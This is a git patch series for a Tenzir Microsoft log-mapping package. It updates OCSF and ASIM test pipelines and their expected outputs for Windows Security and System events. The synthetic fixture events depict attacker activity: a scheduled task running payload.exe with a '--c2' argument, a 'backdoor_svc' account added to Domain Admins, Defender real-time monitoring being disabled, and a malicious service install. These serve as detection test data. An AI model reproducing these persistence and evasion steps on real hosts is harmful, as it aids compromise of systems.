b/microsoft/tests/ocsf/eid-4698.txt index 975595f..f6e7a8f 100644 --- a/microsoft/tests/ocsf/eid-4698.txt +++ b/microsoft/tests/ocsf/eid-4698.txt @@ -47,6 +47,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4698\n 0\n 0\n 12804\n 0x8020000000000000\n \n 98766\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><Triggers><BootTrigger><StartBoundary>2024-03-23T12:00:00</StartBoundary><Enabled>true</Enabled></BootTrigger></Triggers><Actions Context="Author"><Exec><Command>C:\\tmp\\payload.exe</Command><Arguments>--c2 10.0.0.1</Arguments></Exec></Actions></Task>\n 720575940379820032\n 0x1a4c\n 0x1234\n 0\n WINHOST01.corp.local\n \n\n", + raw_data_size: 1728, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4720.tql b/microsoft/tests/ocsf/eid-4720.tql index 6ce7646..19f97bd 100644 --- a/microsoft/tests/ocsf/eid-4720.tql +++ b/microsoft/tests/ocsf/eid-4720.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4720.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4720.txt b/microsoft/tests/ocsf/eid-4720.txt index c2e0b98..45f1280 100644 --- a/microsoft/tests/ocsf/eid-4720.txt +++ b/microsoft/tests/ocsf/eid-4720.txt @@ -41,6 +41,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4720\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98767\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n backdoor_svc\n %%1793\n -\n %%1793\n %%1793\n %%1793\n %%1793\n %%1793\n %%1794\n %%1794\n 513\n -\n 0x0\n 0x15\n %%2080 %%2082 %%2084\n %%1793\n -\n %%1797\n -\n \n\n", + raw_data_size: 1899, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4722.tql b/microsoft/tests/ocsf/eid-4722.tql index 97da69e..57418cf 100644 --- a/microsoft/tests/ocsf/eid-4722.tql +++ b/microsoft/tests/ocsf/eid-4722.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4722.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4722.txt b/microsoft/tests/ocsf/eid-4722.txt index 8313d16..17190f3 100644 --- a/microsoft/tests/ocsf/eid-4722.txt +++ b/microsoft/tests/ocsf/eid-4722.txt @@ -41,6 +41,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4722\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98770\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n \n\n", + raw_data_size: 1050, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4725.tql b/microsoft/tests/ocsf/eid-4725.tql index 72d581b..8abca0d 100644 --- a/microsoft/tests/ocsf/eid-4725.tql +++ b/microsoft/tests/ocsf/eid-4725.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4725.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4725.txt b/microsoft/tests/ocsf/eid-4725.txt index 2ec1e11..7032194 100644 --- a/microsoft/tests/ocsf/eid-4725.txt +++ b/microsoft/tests/ocsf/eid-4725.txt @@ -41,6 +41,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4725\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98773\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n \n\n", + raw_data_size: 1050, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4726.tql b/microsoft/tests/ocsf/eid-4726.tql index ef7f4cc..fdfdfd0 100644 --- a/microsoft/tests/ocsf/eid-4726.tql +++ b/microsoft/tests/ocsf/eid-4726.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4726.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4726.txt b/microsoft/tests/ocsf/eid-4726.txt index 1cdb6a2..87ce402 100644 --- a/microsoft/tests/ocsf/eid-4726.txt +++ b/microsoft/tests/ocsf/eid-4726.txt @@ -41,6 +41,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4726\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98774\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n -\n \n\n", + raw_data_size: 1090, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4728.tql b/microsoft/tests/ocsf/eid-4728.tql index f13f6c9..477cbac 100644 --- a/microsoft/tests/ocsf/eid-4728.tql +++ b/microsoft/tests/ocsf/eid-4728.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4728.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4728.txt b/microsoft/tests/ocsf/eid-4728.txt index 5f2665d..1678517 100644 --- a/microsoft/tests/ocsf/eid-4728.txt +++ b/microsoft/tests/ocsf/eid-4728.txt @@ -46,6 +46,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4728\n 0\n 0\n 13826\n 0x8020000000000000\n \n 98776\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n CN=backdoor_svc,CN=Users,DC=corp,DC=local\n S-1-5-21-3107921522-2185401913-891411500-1500\n DomainAdmins\n CORP\n S-1-5-21-3107921522-2185401913-891411500-512\n -\n \n\n", + raw_data_size: 1246, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4730.tql b/microsoft/tests/ocsf/eid-4730.tql index 504daa0..f41795b 100644 --- a/microsoft/tests/ocsf/eid-4730.tql +++ b/microsoft/tests/ocsf/eid-4730.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4730.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4730.txt b/microsoft/tests/ocsf/eid-4730.txt index 97eb1f7..c9fdd11 100644 --- a/microsoft/tests/ocsf/eid-4730.txt +++ b/microsoft/tests/ocsf/eid-4730.txt @@ -46,6 +46,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4730\n 0\n 0\n 13827\n 0x8020000000000000\n \n 98778\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n OldAdmins\n CORP\n S-1-5-21-3107921522-2185401913-891411500-2000\n -\n \n\n", + raw_data_size: 1087, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4732.tql b/microsoft/tests/ocsf/eid-4732.tql index 6f20bbb..7eebaaa 100644 --- a/microsoft/tests/ocsf/eid-4732.tql +++ b/microsoft/tests/ocsf/eid-4732.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4732.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4732.txt b/microsoft/tests/ocsf/eid-4732.txt index d7db2d9..d424e03 100644 --- a/microsoft/tests/ocsf/eid-4732.txt +++ b/microsoft/tests/ocsf/eid-4732.txt @@ -46,6 +46,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4732\n 0\n 0\n 13826\n 0x8020000000000000\n \n 98768\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n CN=backdoor_svc,CN=Users,DC=corp,DC=local\n S-1-5-21-3107921522-2185401913-891411500-1500\n Administrators\n Builtin\n S-1-5-32-544\n -\n \n\n", + raw_data_size: 1224, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4769.tql b/microsoft/tests/ocsf/eid-4769.tql index a1e5d6d..b3aab4a 100644 --- a/microsoft/tests/ocsf/eid-4769.tql +++ b/microsoft/tests/ocsf/eid-4769.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4769.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4769.txt b/microsoft/tests/ocsf/eid-4769.txt index b8fb350..a7c572c 100644 --- a/microsoft/tests/ocsf/eid-4769.txt +++ b/microsoft/tests/ocsf/eid-4769.txt @@ -34,6 +34,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4769\n 0\n 0\n 14337\n 0x8020000000000000\n \n 98769\n \n \n Security\n DC01.corp.local\n \n \n jdoe@CORP.LOCAL\n CORP.LOCAL\n cifs/fileserver.corp.local\n S-1-5-21-3107921522-2185401913-891411500-1103\n 0x40810000\n 0x12\n ::ffff:10.0.0.42\n 49827\n 0x0\n {B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}\n -\n \n\n", + raw_data_size: 1239, session: { uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", }, diff --git a/microsoft/tests/ocsf/eid-4771.tql b/microsoft/tests/ocsf/eid-4771.tql index f80b305..60c788d 100644 --- a/microsoft/tests/ocsf/eid-4771.tql +++ b/microsoft/tests/ocsf/eid-4771.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4771.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4771.txt b/microsoft/tests/ocsf/eid-4771.txt index 8d74b30..0869d83 100644 --- a/microsoft/tests/ocsf/eid-4771.txt +++ b/microsoft/tests/ocsf/eid-4771.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4771\n 0\n 0\n 14339\n 0x8020000000000000\n \n 98770\n \n \n Security\n DC01.corp.local\n \n \n krbtgt\n S-1-5-21-3107921522-2185401913-891411500-502\n krbtgt/CORP.LOCAL\n 0x40810010\n 0x18\n 2\n ::ffff:10.0.0.42\n 49827\n -\n -\n -\n \n\n", + raw_data_size: 1162, severity: "Low", severity_id: 2, src_endpoint: { diff --git a/microsoft/tests/ocsf/eid-4776.tql b/microsoft/tests/ocsf/eid-4776.tql index 84842a4..0079bd1 100644 --- a/microsoft/tests/ocsf/eid-4776.tql +++ b/microsoft/tests/ocsf/eid-4776.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4776.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4776.txt b/microsoft/tests/ocsf/eid-4776.txt index 72b7693..4c7d402 100644 --- a/microsoft/tests/ocsf/eid-4776.txt +++ b/microsoft/tests/ocsf/eid-4776.txt @@ -33,6 +33,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4776\n 0\n 0\n 14336\n 0x8020000000000000\n \n 98771\n \n \n Security\n DC01.corp.local\n \n \n MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n Administrator\n WINHOST01\n 0xC000006A\n \n\n", + raw_data_size: 862, severity: "Informational", severity_id: 1, src_endpoint: { diff --git a/microsoft/tests/ocsf/eid-5001.tql b/microsoft/tests/ocsf/eid-5001.tql index 40e51f6..5f06648 100644 --- a/microsoft/tests/ocsf/eid-5001.tql +++ b/microsoft/tests/ocsf/eid-5001.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-5001.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-5001.txt b/microsoft/tests/ocsf/eid-5001.txt index b176845..87cc570 100644 --- a/microsoft/tests/ocsf/eid-5001.txt +++ b/microsoft/tests/ocsf/eid-5001.txt @@ -38,6 +38,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 5001\n 0\n 3\n 0\n 0x8000000000000000\n \n 45001\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n \n\n", + raw_data_size: 779, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-5007.tql b/microsoft/tests/ocsf/eid-5007.tql index 2d916dc..f60c7f9 100644 --- a/microsoft/tests/ocsf/eid-5007.tql +++ b/microsoft/tests/ocsf/eid-5007.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-5007.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-5007.txt b/microsoft/tests/ocsf/eid-5007.txt index 38eb39f..73a61c3 100644 --- a/microsoft/tests/ocsf/eid-5007.txt +++ b/microsoft/tests/ocsf/eid-5007.txt @@ -38,6 +38,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 5007\n 0\n 4\n 0\n 0x8000000000000000\n \n 45007\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x0\n HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x1\n \n\n", + raw_data_size: 1035, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-6005.tql b/microsoft/tests/ocsf/eid-6005.tql index 7125358..fb03d3c 100644 --- a/microsoft/tests/ocsf/eid-6005.tql +++ b/microsoft/tests/ocsf/eid-6005.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-6005.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-6005.txt b/microsoft/tests/ocsf/eid-6005.txt index a1e0dd4..a05a29c 100644 --- a/microsoft/tests/ocsf/eid-6005.txt +++ b/microsoft/tests/ocsf/eid-6005.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 6005\n 0\n 4\n 0\n 0x8080000000000000\n \n 1\n \n \n System\n WINHOST01.corp.local\n \n \n The Event log service was started.\n \n\n", + raw_data_size: 591, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-6006.tql b/microsoft/tests/ocsf/eid-6006.tql index ea2511d..9febc1f 100644 --- a/microsoft/tests/ocsf/eid-6006.tql +++ b/microsoft/tests/ocsf/eid-6006.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-6006.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-6006.txt b/microsoft/tests/ocsf/eid-6006.txt index da234e2..156920d 100644 --- a/microsoft/tests/ocsf/eid-6006.txt +++ b/microsoft/tests/ocsf/eid-6006.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 6006\n 0\n 4\n 0\n 0x8080000000000000\n \n 2\n \n \n System\n WINHOST01.corp.local\n \n \n The Event log service was stopped.\n \n\n", + raw_data_size: 591, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:58.123456700Z, diff --git a/microsoft/tests/ocsf/eid-7034.tql b/microsoft/tests/ocsf/eid-7034.tql index 8423e23..b5c8200 100644 --- a/microsoft/tests/ocsf/eid-7034.tql +++ b/microsoft/tests/ocsf/eid-7034.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-7034.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-7034.txt b/microsoft/tests/ocsf/eid-7034.txt index f65ca69..34c3442 100644 --- a/microsoft/tests/ocsf/eid-7034.txt +++ b/microsoft/tests/ocsf/eid-7034.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 7034\n 0\n 2\n 0\n 0x8080000000000000\n \n 44321\n \n \n System\n WINHOST01.corp.local\n \n \n PayloadSvc\n 1\n \n\n", + raw_data_size: 759, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-7045.tql b/microsoft/tests/ocsf/eid-7045.tql index 26e225f..66c7eab 100644 --- a/microsoft/tests/ocsf/eid-7045.tql +++ b/microsoft/tests/ocsf/eid-7045.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-7045.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-7045.txt b/microsoft/tests/ocsf/eid-7045.txt index 23521d6..1dde7b2 100644 --- a/microsoft/tests/ocsf/eid-7045.txt +++ b/microsoft/tests/ocsf/eid-7045.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 7045\n 0\n 4\n 0\n 0x8080000000000000\n \n 44322\n \n \n System\n WINHOST01.corp.local\n \n \n PayloadSvc\n C:\\tmp\\payload.exe --svc\n Own Process\n Auto Start\n LocalSystem\n \n\n", + raw_data_size: 931, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-9999.tql b/microsoft/tests/ocsf/eid-9999.tql index fe23989..c407776 100644 --- a/microsoft/tests/ocsf/eid-9999.tql +++ b/microsoft/tests/ocsf/eid-9999.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-9999.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-9999.txt b/microsoft/tests/ocsf/eid-9999.txt index b97390e..7e4516e 100644 --- a/microsoft/tests/ocsf/eid-9999.txt +++ b/microsoft/tests/ocsf/eid-9999.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 9999\n 0\n 4\n 0\n 0x8000000000000000\n \n 999900\n \n \n Example\n WINHOST01.corp.local\n \n \n Unsupported Windows event\n \n\n", + raw_data_size: 665, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, From 99ab77f7496ccd27a37075e6f9914ff73b08fd1f Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 18:56:15 +0200 Subject: [PATCH 18/27] Compose Microsoft ASIM mapping explicitly Make microsoft::asim::map expect OCSF input instead of hiding the Microsoft-to-OCSF conversion and OCSF derive/cast steps. Add examples that show the explicit OCSF-to-ASIM pipeline for Windows XML and Graph sign-ins. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/examples/graph-sign-ins-to-asim.tql | 19 +++++++++++++++++++ .../examples/windows-event-log-to-asim.tql | 18 ++++++++++++++++++ microsoft/operators/asim/map.tql | 16 ++-------------- microsoft/tests/asim/graph.tql | 5 +++++ microsoft/tests/asim/windows.tql | 8 +++++++- microsoft/tests/asim/windows.txt | 2 ++ 6 files changed, 53 insertions(+), 15 deletions(-) create mode 100644 microsoft/examples/graph-sign-ins-to-asim.tql create mode 100644 microsoft/examples/windows-event-log-to-asim.tql diff --git a/microsoft/examples/graph-sign-ins-to-asim.tql b/microsoft/examples/graph-sign-ins-to-asim.tql new file mode 100644 index 0000000..193eb60 --- /dev/null +++ b/microsoft/examples/graph-sign-ins-to-asim.tql @@ -0,0 +1,19 @@ +--- +name: Microsoft Graph sign-ins -> ASIM +description: Fetch recent Microsoft Entra ID sign-in logs, map them through OCSF, and convert them to Microsoft Sentinel ASIM. +--- + +microsoft::graph::sign_ins \ + tenant_id="TENANT_ID", + client_id="CLIENT_ID", + client_secret=secret("CLIENT_SECRET"), + lookback=5m +@name = "microsoft.graph.sign_in" +event = this +microsoft::ocsf::map event=event +this = event +ocsf::derive +ocsf::cast +event = this +microsoft::asim::map event=event +this = event diff --git a/microsoft/examples/windows-event-log-to-asim.tql b/microsoft/examples/windows-event-log-to-asim.tql new file mode 100644 index 0000000..b5ba3c3 --- /dev/null +++ b/microsoft/examples/windows-event-log-to-asim.tql @@ -0,0 +1,18 @@ +--- +name: Windows Event Log XML -> ASIM +description: Parse Windows Event Log XML, map it through OCSF, and convert it to Microsoft Sentinel ASIM. +--- + +from_file "windows-event.xml" { + read_all +} +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win +ocsf::derive +ocsf::cast +event = this +microsoft::asim::map event=event +this = event diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql index 6a6e56c..9bdc15d 100644 --- a/microsoft/operators/asim/map.tql +++ b/microsoft/operators/asim/map.tql @@ -1,22 +1,10 @@ --- -description: Maps supported Microsoft events to Microsoft Sentinel ASIM. +description: Maps validated Microsoft OCSF events to Microsoft Sentinel ASIM. args: named: - name: event - description: The field that holds the Microsoft event to map. + description: The field that holds the OCSF event to map. type: field --- -if $event.class_uid? == null { - microsoft::ocsf::map event=$event - _microsoft_outer = this - _microsoft_event = $event - this = _microsoft_event - ocsf::derive - ocsf::cast - _microsoft_outer._microsoft_event = this - this = _microsoft_outer - $event = move _microsoft_event -} - microsoft::asim::ocsf::map event=$event diff --git a/microsoft/tests/asim/graph.tql b/microsoft/tests/asim/graph.tql index 1786139..ec0b8ec 100644 --- a/microsoft/tests/asim/graph.tql +++ b/microsoft/tests/asim/graph.tql @@ -3,6 +3,11 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { } @name = "microsoft.graph.sign_in" event = this +microsoft::ocsf::map event=event +this = event +ocsf::derive +ocsf::cast +event = this microsoft::asim::map event=event this = event name = @name diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql index cd97789..380fadb 100644 --- a/microsoft/tests/asim/windows.tql +++ b/microsoft/tests/asim/windows.tql @@ -1,7 +1,13 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" { read_all } -this = data.parse_winlog() +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win +ocsf::derive +ocsf::cast event = this microsoft::asim::map event=event this = event diff --git a/microsoft/tests/asim/windows.txt b/microsoft/tests/asim/windows.txt index 90b178f..6f7df95 100644 --- a/microsoft/tests/asim/windows.txt +++ b/microsoft/tests/asim/windows.txt @@ -82,6 +82,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4624\n 2\n 0\n 12544\n 0x8020000000000000\n \n 98761\n \n \n Security\n DC01.corp.local\n \n \n S-1-0-0\n -\n -\n 0x0\n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 3\n Kerberos\n Kerberos\n -\n {B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}\n -\n -\n 0\n 0x0\n -\n 10.0.0.42\n 49827\n %%1833\n -\n -\n -\n %%1843\n 0x0\n %%1842\n \n\n", + raw_data_size: 1918, session: { uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", uid_alt: "0xA1B2C3", From 83c2b18063e56d7802506a21d34564c79418bd07 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 18:58:01 +0200 Subject: [PATCH 19/27] Document future ASIM map bridge Leave the Microsoft ASIM wrapper as an OCSF-only mapper for now, but document the intended source-to-ASIM bridge once OCSF derive and cast support field-targeted operation. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/map.tql | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql index 9bdc15d..526533d 100644 --- a/microsoft/operators/asim/map.tql +++ b/microsoft/operators/asim/map.tql @@ -7,4 +7,15 @@ args: type: field --- +// If `ocsf::derive` and `ocsf::cast` gain `event=` support, this wrapper can +// also bridge Microsoft source events to ASIM without temporarily replacing +// `this`: +// +// if $event.class_uid? == null { +// microsoft::ocsf::map event=$event +// ocsf::derive event=$event +// ocsf::cast event=$event +// } +// +// Until then, callers compose these steps explicitly before invoking this UDO. microsoft::asim::ocsf::map event=$event From f77184254e8a1a6d049940c32f6a32a76b6770cf Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Thu, 11 Jun 2026 17:10:33 +0200 Subject: [PATCH 20/27] Simplify unsupported ASIM map test Call the OCSF-to-ASIM mapper with this directly in the unsupported mapping fixture. Without strict, the assertion remains a warning instead of making the test expect a failing pipeline. Assisted-by: GPT-5 (Codex) --- microsoft/tests/asim/ocsf/map.tql | 9 +-------- microsoft/tests/asim/ocsf/map.txt | 2 +- 2 files changed, 2 insertions(+), 9 deletions(-) diff --git a/microsoft/tests/asim/ocsf/map.tql b/microsoft/tests/asim/ocsf/map.tql index 951d4c7..e6278b8 100644 --- a/microsoft/tests/asim/ocsf/map.tql +++ b/microsoft/tests/asim/ocsf/map.tql @@ -1,7 +1,3 @@ ---- -error: true ---- - from { activity_id: 1, activity_name: "Execute", @@ -25,7 +21,4 @@ from { }, } @name = "ocsf.script_activity" -strict { - event = this - microsoft::asim::ocsf::map event=event -} +microsoft::asim::ocsf::map event=this diff --git a/microsoft/tests/asim/ocsf/map.txt b/microsoft/tests/asim/ocsf/map.txt index 44a4da6..7bb1d80 100644 --- a/microsoft/tests/asim/ocsf/map.txt +++ b/microsoft/tests/asim/ocsf/map.txt @@ -1 +1 @@ -error: assertion failed: {reason:"unsupported OCSF to ASIM mapping",class_uid:1009,class_name:"Script 